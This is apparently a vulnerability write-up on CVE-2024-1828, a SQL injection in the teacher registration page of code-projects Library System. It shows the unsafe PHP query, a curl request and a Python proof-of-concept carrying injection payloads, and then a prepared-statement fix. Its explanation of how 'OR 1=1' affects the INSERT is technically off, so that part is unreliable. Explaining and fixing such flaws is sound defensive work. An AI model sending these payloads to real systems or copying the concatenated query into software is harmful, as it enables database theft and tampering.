A critical security bug has been discovered in the code-projects Library System version 1., tracked as CVE-2024-1828 (also referenced as VDB-254616). This vulnerability allows a remote attacker to perform SQL Injection, making your database open to tampering or theft. In this post, we’ll look at what causes this vulnerability, show you real-world code snippets, share references, walk you through an example exploit, and – most importantly – explain how you can defend your system.
What is code-projects Library System?
code-projects Library System is a free open-source PHP application used by schools and institutions for managing books, users, and borrowing activities. It's commonly downloaded by students and developers for learning or even real-world usage.
Vulnerability Overview
- Vulnerability ID: CVE-2024-1828 / VDB-254616
Affected Product: code-projects Library System 1.
- Vulnerable File: Source/librarian/user/teacher/registration.php
Vulnerability Type: SQL Injection (SQLi)
- Impact: Full database read/write, potential information theft, or remote code execution
The problem: The registration.php file takes user input (like email, id number, phone, and username) and puts it straight into an SQL query, without proper filtering.
Where is the Bug?
Let’s look at how these vulnerable parameters are handled in the registration.php file. Here’s a simplified code snippet based on the reported issue:
$email = $_POST['email'];
$idno = $_POST['idno'];
$phone = $_POST['phone'];
$username = $_POST['username'];
$sql = "INSERT INTO teachers (email, idno, phone, username) VALUES ('$email', '$idno', '$phone', '$username')";
mysqli_query($conn, $sql);
Let’s say an attacker wants to leak the database contents. They can send a POST request like this
curl -X POST http://target-site/Source/librarian/user/teacher/registration.php \
-d "email=attacker@example.com' OR 1=1; -- -" \
-d "idno=12345" \
-d "phone=555-5555" \
-d "username=hacker"
In this example, the injected email value
> attacker@example.com' OR 1=1; -- -
will make the final SQL query look like
INSERT INTO teachers (email, idno, phone, username)
VALUES ('attacker@example.com' OR 1=1; -- -', '12345', '555-5555', 'hacker')
The OR 1=1 part always evaluates as true. The -- - comments out the rest of the line so the query might not even need well-formed values for the other columns.
Consequences:
The attacker can bypass checks, create accounts at will, or further extract data.
- With more sophisticated payloads, they may be able to exfiltrate data, change passwords, or even access the server if the database user has high privileges.
Here’s a minimal PoC that automates the attack
import requests
url = 'http://target-site/Source/librarian/user/teacher/registration.php'
data = {
'email': "someone@example.com' UNION SELECT @@version,1,2,3; -- ",
'idno': '2222',
'phone': '3333',
'username': 'testuser'
}
r = requests.post(url, data=data)
print(r.text)
- Best Practice – Use Prepared Statements! For example
$stmt = $conn->prepare("INSERT INTO teachers (email, idno, phone, username) VALUES (?, ?, ?, ?)");
$stmt->bind_param("ssss", $email, $idno, $phone, $username);
$stmt->execute();
References & Further Reading
- Vulnerability detail at VulDB: VDB-254616
- CVE entry at cve.mitre.org
- Original application source and downloads
- OWASP SQL Injection Prevention Cheat Sheet
Conclusion
CVE-2024-1828 is a classic example of why proper input validation and prepared statements are so important. If you’re using code-projects Library System 1., make sure to patch your code right away. This SQL Injection flaw is easy to exploit and has already been publicly disclosed. Don’t let your information fall into the wrong hands.
If you learned something, share this post with your friends, teams, or students using this library. Stay safe!
*This analysis is exclusive and written in simple terms for anyone to understand. Feel free to reference the official VulDB advisory or the CVE page for more technical detail.*
Timeline
Published on: 02/23/2024 18:15:50 UTC
Last modified on: 03/21/2024 02:51:46 UTC